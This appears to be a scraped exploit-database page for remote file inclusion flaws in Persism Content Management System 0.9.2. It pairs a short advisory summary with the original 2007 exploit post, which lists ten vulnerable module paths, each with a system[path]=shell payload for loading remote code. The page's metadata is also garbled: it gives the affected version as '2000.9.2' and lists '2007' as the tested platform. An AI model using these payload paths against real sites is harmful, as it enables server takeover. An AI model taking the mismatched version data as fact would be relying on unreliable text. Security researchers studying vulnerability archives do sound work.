Persism Content Management System

vendor:

by:

GolD_M = [Mahmood_ali]

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Persism Content Management System

Affected Version From: 2000.9.2

Affected Version To: 2000.9.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Persism Content Management System <= 0.9.2 Multiple Remote File Inclusion Vulnerabilities

Multiple Remote File Inclusion vulnerabilities exist in Persism Content Management System version 0.9.2 and below. The vulnerabilities can be exploited by an attacker to include arbitrary files from remote servers, leading to remote code execution.

Mitigation:

Update to a patched version of the Persism Content Management System.

Source

Exploit-DB raw data:

# Persism Content Management System <= 0.9.2 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.persism.com/emil/0.9.2/0.9.2.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/modules/blocks/headerfile.php?system[path]=Shell
# Exploit:[Path]/modules/files/blocks/latest_files.php?system[path]=Shell
# Exploit:[Path]/modules/filters/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/forums/blocks/latest_posts.php?system[path]=shell
# Exploit:[Path]/modules/groups/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/links/blocks/links.php?system[path]=shell
# Exploit:[Path]/modules/menu/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/news/blocks/latest_news.php?system[path]=shell
# Exploit:[Path]/modules/settings/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/users/headerfile.php?system[path]=shell
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-04]